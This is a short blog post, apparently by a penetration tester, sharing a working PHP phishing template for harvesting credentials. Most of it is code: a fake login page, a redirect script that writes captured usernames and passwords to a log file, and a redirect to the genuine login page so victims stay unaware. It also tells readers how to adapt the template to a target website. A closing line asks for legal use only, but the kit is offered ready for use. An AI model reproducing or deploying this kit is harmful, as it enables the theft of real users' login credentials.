A Simple Phishing (Credential Harvester) Website Template

As you already know, Kali Linux comes with Social Engineering Toolkit where you can clone the sign-in page of a target website and start hosting that site from your own machine to retrieve the credentials.

But sometimes this may simply not work. The website may be protected somehow against automatic cloning. This happened to me on a recent pentest case. There it becomes necessary to make our hands dirty and prepare the phishing page manually. Here I want to share a simple credential harvester template code to start in a similar situation. It is not rocket science but you may want to just keep it inside your bag 🙂

Anyhow, in my scenario I prepared three php websites:

1) Fake-login.php: This is where the victim inputs their credentials.

2) Redirect.php: This is where we log the retrieved credentials and redirect the user to the original-login.php

3) Original-login.php: This is the real website hosted by the target system thus the user wouldn’t realize where s/he just was.

The code for fake-login.php:

<html>

<head>

Company Information System

</head>

<body>

<form id=”contact_form” action=’redirect.php’ method=”post”>

<label>Username: <input class=”textfield” name=”username” type=”text” value=”” /></label>

<label>Password: <input class=”textfield” name=”password” type=”text” value=”” /></label>

<input type=”submit” name=”Submit” value=”Submit”/>

</form>

</body>

</html>

The code for redirect.php:

<?php

$username = $_REQUEST[‘username’];

$password = $_REQUEST[‘password’];

if (($username != null) and ($password != null)) {

echo $username . “ ” . $password;

$data = $username . “ ” . $password;

$ifp = fopen(‘log.txt’, ‘a’);

fwrite($ifp, $data.PHP_EOL);

fclose($ifp);

}

function Redirect($url, $permanent = false) {

if (headers_sent() === false) {

header(‘Location: ‘ . $url, true, ($permanent === true) ? 301 : 302);

}

exit(); }

Redirect(‘http://localhost/phishing/original-login.php’, false);

?>

And finally the code for original-login.php:

<html>

<head>

Company Information System Original Website

</head>

<body>

<form id=“contact_form” action=’original-login.php’ method=“post”>

<label>Username: <input class=”textfield” name=”username” type=”text” value=“” /></label>

<label>Password: <input class=“textfield” name=“password” type=“text” value=“” /></label>

<input type=“submit” name=“Submit” value=“Submit”/>

</form>

</body>

</html>

You can use this code sample as a template to customize it according to your target website. Just download the source code of the target website, make sure username and password fields match the code above and make it go to redirect.php page after that. Make sure that the directory you host these pages allow write credentials to enable logging.

Please use this code only for legal purposes, don’t be dumb, it is unnecessary.